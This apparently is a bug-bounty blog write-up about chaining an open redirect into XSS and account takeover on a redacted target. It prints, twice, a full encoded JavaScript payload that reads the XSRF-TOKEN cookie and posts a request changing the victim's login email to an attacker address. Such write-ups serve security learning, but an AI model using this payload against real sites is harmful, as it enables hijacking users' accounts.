Chaining Open Redirect with XSS to Account Takeover

Cover image source: dev.to/sam5epi0l

Hello everyone, I hope you are well. In this article I will show you how I escalated an XSS to Account Takeover. Since the target is private, let's call it target.com.

The Open Redirect

I started testing the target and registered an account. During registration I could create my own subdomain for the organization, like ownsubdomain.target.com. Then I logged in to the dashboard. Not long after, I found a URL endpoint like this: https://ownsubdomain.target.com/overview/?ccpa_redirect=

URL Endpoint

Then I tried an open redirect like this: ownsubdomain.target.com/overview/?ccpa_redi..evil.com, and it worked: I was redirected to the evil.com page :D. Next I put the XSS payload javascript:alert(1); in the same parameter, opened it in the browser, and yeah, the XSS popped up.

Chaining the XSS to Account Takeover

After that, I didn't immediately report the bug. I wanted to escalate this XSS to a more severe impact. Shortly afterwards, I found a form that lets me change my email, like this:

Form Change Email

But it was protected by a CSRF token. Then I remembered that I had read a writeup about chaining XSS to a more severe impact. So I built a payload that changes my email and uses the XSS to bypass the CSRF-token protection: the script reads the XSRF-TOKEN cookie from document.cookie and sends it back in the X-Xsrf-Token header. The payload was like this:

javascript:var%20http=new%20XMLHttpRequest();%20http.open(%27POST%27,%27https://ownsubdomain.target.com/api/3/settings/account%27,%20true);var%20csrf=%20document.cookie.split(%27;%20%27).find(row%20=%253e%20row.startsWith(%27XSRF-TOKEN%27)).split(%27=%27)[1];http.setRequestHeader(%27X-Xsrf-Token%27,csrf);http.withCredentials=true;http.setRequestHeader(%27Content-type%27,%27application/x-www-form-urlencoded%27);http.send(%27firstName=Hacked%2526lastName=byHacker%2526loginEmail=attacker@mail.com%26phoneNumber=%2526notificationEmail=attacker@mail.com%2526signature=%2526timezone=Asia/Jakarta%2526language=english%27);alert('email%20changed');

So when a user visits this URL in the browser: https://ownsubdomain.target.com/overview/?ccpa_redirect=javascript:var%20http=new%20XMLHttpRequest();%20http.open(%27POST%27,%27https://subdomain.target.com/api/3/settings/account%27,%20true);var%20csrf=%20document.cookie.split(%27;%20%27).find(row%20=%253e%20row.startsWith(%27XSRF-TOKEN%27)).split(%27=%27)[1];http.setRequestHeader(%27X-Xsrf-Token%27,csrf);http.withCredentials=true;http.setRequestHeader(%27Content-type%27,%27application/x-www-form-urlencoded%27);http.send(%27firstName=Hacked%2526lastName=byHacker%2526loginEmail=attacker@mail.com%26phoneNumber=%2526notificationEmail=attacker@mail.com%2526signature=%2526timezone=Asia/Jakarta%2526language=english%27);alert('email%20changed'); the alert pops up and the email is changed.

Alert popped up

Email changed successfully

Then I reported this to the program, but sadly it was a duplicate D:

I hope you enjoyed my article; keep learning and stay safe.

Tips:

Don’t be quick to report any bugs you find, always look for more severe impacts.

Reference:

https://melotover.medium.com/how-i-leveraged-xss-to-make-privilege-escalation-to-be-super-admin-e120b6090451

Follow me on Twitter:

https://twitter.com/0xrdnzx